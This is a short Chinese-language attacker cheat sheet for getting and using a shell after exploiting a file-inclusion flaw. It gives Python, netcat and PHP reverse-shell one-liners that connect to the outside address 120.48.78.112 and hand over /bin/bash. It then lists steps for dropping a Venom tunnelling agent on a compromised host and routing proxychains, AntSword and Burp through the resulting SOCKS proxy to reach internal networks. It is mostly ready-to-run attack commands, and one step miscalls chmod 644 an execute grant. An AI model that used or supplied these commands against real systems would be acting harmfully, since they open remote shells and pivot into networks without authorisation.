目录
文件包含漏洞弹shell
python 反弹shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
nc弹shell
nc -e /bin/bash 120.48.78.112 6666
php弹shell
php -r '$sock=fsockopen("120.48.78.112",6666);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
proxychains 代理的配置
利用venom内网穿透
服务器端监听:
1、赋予执行权限 chmod 644 admin_linux_x64
2、admin_linux_x64 -lport xxxx
客户端:99999
1、agen_linux_x64放到目标主机
2、尽量放到有执行权限的目录例如/tmp
3、赋予执行权限 chmod 777 agen_linux_x64
4、命令:agen_linux_x64 -lhost xx.xx.xx.xx -lport xxxx
连接成功:
服务器端:
查案节点:show
进入节点:goto 1
设置代理:socks 1080
注意:在proxychains 配置文件
vi /etc/proxychains4.conf
最后一行配置
socks 1080
并且注释掉 remote_dns_subnet 224
在其他内网穿透命令前要用proxychains
中国蚁剑配置代理连接内网穿透
在代理设置里面设置
socks5 127.0.0.1 1080
burp内网抓包
在user options中设置socks5 proxy
socks proxy host 127.0.0.1
socks proxy port 1080